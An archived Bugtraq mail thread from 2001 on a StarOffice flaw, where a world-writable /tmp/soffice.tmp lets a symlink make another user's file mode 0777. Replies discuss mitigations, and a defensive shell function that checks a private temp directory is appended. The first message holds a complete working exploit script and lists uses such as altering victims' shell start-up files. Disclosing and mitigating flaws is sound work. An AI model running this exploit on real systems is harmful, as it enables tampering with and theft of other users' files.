6115455 2001-02-17 16:57 +0100  /106 lines/ JeT Li <jet_li_man@YAHOO.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-20  00:08  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jet_li_man@yahoo.com
Recipient: Bugtraq (import) <15515>
Subject: HeliSec:  StarOffice symlink exploit
------------------------------------------------------------
From: JeT Li <jet_li_man@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01021717035200.05311@JeT-Li>

	- = Helios Security and Administration = -

	Hi everyone,

	StarOffice creates a temporary directory in /tmp called
soffice.tmp, with permissions 0777. Into this directory other
temporary files are created, with the format: svZZZZ.tmp, where ZZZZ
is a four- or five-digit number.

	StarOffice not only creates the /tmp/soffice.tmp directory
with permissions 0777, but also chmod()s it sometimes while StarOffice
is running afterwards. If any user creates a symbolic link from
/tmp/soffice.tmp to any file owned by another user, when this last user
runs StarOffice the target of the link will become 0777. So, if the
directory of the target file is accessible by the malicious user
that created the symlink, he can do whatever he wants with the
file. A few ways to exploit this are:

	- to modify shell start-up files (such as .profile, .bashrc,
.cshrc, etc.) to execute whatever the hacker wants next time the victim
logs in.
	- to gain access to private files with sensitive information,
such as password files, mail spool files, etc.
	- a lot more evil acts.

	StarOffice gives no error message or the like when it changes the
permissions of the target file, so from the victim's point of view: all
is going right ;-)

	Requirements:

	- Access to the target file's directory needed.
	- The target file must NOT be executable.

	Fix:

	One way to fix the problem is to create a directory inside
your home directory which is inaccessible to anyone but yourself
(permissions 700), called tmp. Then insert an entry in your login
start-up file to set the $TMP environment variable to $HOME/tmp, so
it will direct StarOffice to use your temporary directory, rather
than the system /tmp. Something like this (in bash):

	[wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
	(not permanent)
	or modify the .bash_profile adding TMP=$HOME/tmp and
including this variable in the export.

	Here is the exploit code. To make sure that this will work,
first run StarOffice, so you will become owner of /tmp/soffice.tmp,
which is necessary to remove it and create the symlink.

#!/bin/sh
SOFFICE="/tmp/soffice.tmp"
TARGETFILE=$1

if [ $# != 1 ]; then
    echo
    echo "	   - = HeliSec - Helios Security and Administration = -"
    echo "Usage : "
    echo "./soffice.sh <file>"
    echo "Set 0777 permissions to any file (access to the directory of the file needed)"
    echo "						JeT Li	-The Wushu Master-"
    exit
fi

if [ ! -f ${TARGETFILE} ]; then
    echo "Target file must exist"
    exit
fi

rm -rf ${SOFFICE}
ln -sn ${TARGETFILE} ${SOFFICE}
echo
echo "Symbolik link done ..."
echo

perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine ...you may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'

while :
do
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
    echo
    echo "Permissions set succesfully ... good luck ;-)"
    echo
    echo "- = HeliSec - Helios Security and Administration = -"
    echo "		  JeT Li	-The Wushu Master-"
    exit
fi
done

	Cheers,

					JeT Li	-The Wushu Master-	

(6115455) --------------------------------(Rewrapped)
Comment in text 6119648 by Peter W <peterw@USA.NET>
Comment in text 6131430 by Christian <christian@IT.MURDOCH.EDU.AU>
6119648 2001-02-19 22:04 -0500  /47 lines/ Peter W <peterw@USA.NET>
Sent by: joel@lysator.liu.se
Imported: 2001-02-20  21:14  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: peterw@USA.NET
Recipient: Bugtraq (import) <15538>
Comment to text 6115455 by JeT Li <jet_li_man@YAHOO.COM>
Subject: Re: HeliSec:  StarOffice symlink exploit
------------------------------------------------------------
From: Peter W <peterw@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010219220429.A5388@usa.net>

On Sat, Feb 17, 2001 at 04:57:23PM +0100, JeT Li wrote:

> 	One way to fix the problem is to create a directory inside your
> home directory which is inaccessible to anyone but yourself (permissions 700),
> called tmp. Then insert an entry in your login start-up file to set the $TMP
> environment variable to $HOME/tmp, so it will direct StarOffice to use your
> temporary directory, rather than the system /tmp. Something like this (in
> bash):
>
> 	[wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
> 	(not permanent)
> 	or modify the .bash_profile adding TMP=$HOME/tmp and including this
> variable in the export.

BTW, I have some fairly sophisticated TMPDIR/TMP scripts in the CVS
repository for Bastille
(http://sourceforge.net/projects/bastille-linux) that folks might
find useful. The scripts allow you to put TMPDIR somewhere other than
$HOME (say, local /tmp if $HOME is on NFS), to keep track of TMPDIRs
on a host-by-host basis, to hide the number of files and last access
time of $TMPDIR, etc. There's also an ancillary script designed to
keep pruning tools like 'tmpwatch' (frequently found on Linux
systems) from removing $TMPDIR while you're logged in, and to warn
you via multiple channels if something is amiss with your temp dir.

Look for bastille-tmpdir.sh, bastille-tmpdir.csh, and
bastille-tmpdir-defense.sh (the anti-'tmpwatch' tool).

bastille-tmpdir.* go in /etc/profile.d where many systems will run
them at login time (via /etc/bashrc or /etc/csh.login scanning
/etc/profile.d); bastille-tmpdir-defense.sh goes in /etc. All three
should be mode 0755.

These apps will be optional in the soon-to-be-released Bastille 1.2.0
hardening tool for Red Hat and Mandrake Linux distributions. I've
only tested the scripts under Linux, but they should be fairly
portable. Your feedback would be most appreciated.

It's nice that apps let you pick your own preferred temp space ($HOME
in some cases is a poor choice), but it's a shame that some apps
*need* you to do so to behave safely. :-(

-Peter
(6119648) --------------------------------(Rewrapped)
6131430 2001-02-22 11:50 +0800  /22 lines/ Christian <christian@IT.MURDOCH.EDU.AU>
Sent by: joel@lysator.liu.se
Imported: 2001-02-23  13:31  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: christian@IT.MURDOCH.EDU.AU
Recipient: Bugtraq (import) <15581>
Comment to text 6115455 by JeT Li <jet_li_man@YAHOO.COM>
Subject: Re: HeliSec:  StarOffice symlink exploit
------------------------------------------------------------
From: Christian <christian@IT.MURDOCH.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010222115051.A8880@diffie.it.murdoch.edu.au>

On Sat, Feb 17, 2001 at 04:57:23PM +0100, JeT Li wrote:

> 	StarOffice creates a temporary directory in /tmp called soffice.tmp,
> with permissions 0777. Into this directory other temporary files are created,
> with the format: svZZZZ.tmp, where ZZZZ is a four- or five-digit number.

<snip>

I reported this problem to BUGTRAQ on November 8, 2000.  See
http://www.securityfocus.com/bid/1922 for more details.  I believe
Sun has now released patches for this issue.  It always helps to do a
search before reporting a "new" vulnerability. :-)

Regards,

Christian.
(6131430) --------------------------------(Rewrapped)
Comment in text 6131488 by JeT Li <jet_li_man@YAHOO.COM>
Comment in text 6131563 by Kurt Seifried <bugtraq@SEIFRIED.ORG>
6131488 2001-02-21 19:59 +0100  /25 lines/ JeT Li <jet_li_man@YAHOO.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-02-23  13:34  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jet_li_man@yahoo.com
Recipient: Bugtraq (import) <15583>
Comment to text 6131430 by Christian <christian@IT.MURDOCH.EDU.AU>
Subject: Re: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: JeT Li <jet_li_man@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01022120233800.00939@JeT-Li>

> I reported this problem to BUGTRAQ on November 8, 2000.  See
> http://www.securityfocus.com/bid/1922 for more details.  I believe Sun
> has now released patches for this issue.  It always helps to do a search
> before reporting a "new" vulnerability. :-)
>
> Regards,
>
> Christian.

	Hi Christian, I had already seen your post when I sent
mine ;-) I know that this vulnerability is not new, and I didn't say
that it was. I have included an exploit because there was none for
this flaw, and I have explained a little more how to fix the
problem. Thank u for the info, regards:

					JeT Li	-The Wushu Master-

(6131488) --------------------------------(Rewrapped)
6131563 2001-02-22 14:34 -0700  /17 lines/ Kurt Seifried <bugtraq@SEIFRIED.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-02-23  13:39  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: bugtraq@SEIFRIED.ORG
Recipient: Bugtraq (import) <15594>
Comment to text 6131430 by Christian <christian@IT.MURDOCH.EDU.AU>
Subject: Re: HeliSec:  StarOffice symlink exploit
------------------------------------------------------------
From: Kurt Seifried <bugtraq@SEIFRIED.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01ad01c09d17$36888860$3200030a@seifried.org>

> > StarOffice creates a temporary directory in /tmp called soffice.tmp,
> > with permissions 0777. Into this directory other temporary files are
> > created, with the format: svZZZZ.tmp, where ZZZZ is a four- or
> > five-digit number.

StarOffice honors $TMP, so create /home/foo/tmp and set your TMP
variable. This is not a solution per se I know, but it does help (and
more and more apps are honoring the $TMP/$TMPDIR variable).

Kurt Seifried, seifried@securityportal.com
Securityportal - your focal point for security on the 'net
(6131563) --------------------------------(Rewrapped)
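
Added example (not part of any message in this thread, and not the Bastille scripts Peter W mentions): a login start-up fragment for the $TMP workaround that JeT Li and Kurt Seifried describe, which first checks the directory for the same conditions the advisory is about (symlink, foreign owner, group/other access) before exporting TMP and TMPDIR. The function names audit_tmp_entry and use_private_tmp are hypothetical.

```shell
#!/bin/sh
# Added example; function names are hypothetical, not from the thread.

# Classify a path without modifying it. Prints one word:
#   absent | symlink | not-a-directory | foreign-owner | shared | private
audit_tmp_entry() {
    p=$1
    # test -L inspects the link itself; every later test would follow it.
    if [ -L "$p" ]; then echo symlink; return 0; fi
    if [ ! -e "$p" ]; then echo absent; return 0; fi
    if [ ! -d "$p" ]; then echo not-a-directory; return 0; fi
    if [ ! -O "$p" ]; then echo foreign-owner; return 0; fi
    # ls -ld prints e.g. "drwxrwxrwx"; characters 5-10 are the group and
    # other bits, which must all be "-" for a 0700 directory.
    case $(ls -ld -- "$p" | cut -c5-10) in
        ------) echo private ;;
        *)      echo shared ;;
    esac
}

# Create the per-user temp directory if needed, validate it, and only then
# export TMP and TMPDIR. Returns 1 and leaves the environment untouched if
# the directory is anything other than "private".
# Assumption: the parent directory (normally $HOME) is writable only by the
# user, so nobody else can swap the entry between the check and its use.
use_private_tmp() {
    dir=${1:-$HOME/tmp}
    if [ "$(audit_tmp_entry "$dir")" = absent ]; then
        # umask 077 makes mkdir create the directory with mode 0700.
        (umask 077 && mkdir "$dir") 2>/dev/null || :
    fi
    state=$(audit_tmp_entry "$dir")
    if [ "$state" != private ]; then
        echo "refusing $dir as temp dir: $state" >&2
        return 1
    fi
    TMP=$dir; TMPDIR=$dir
    export TMP TMPDIR
}
```

Sourced from a login start-up file, a call to use_private_tmp with no argument sets up $HOME/tmp; audit_tmp_entry /tmp/soffice.tmp reports "symlink" or "shared" for the states described in the advisory.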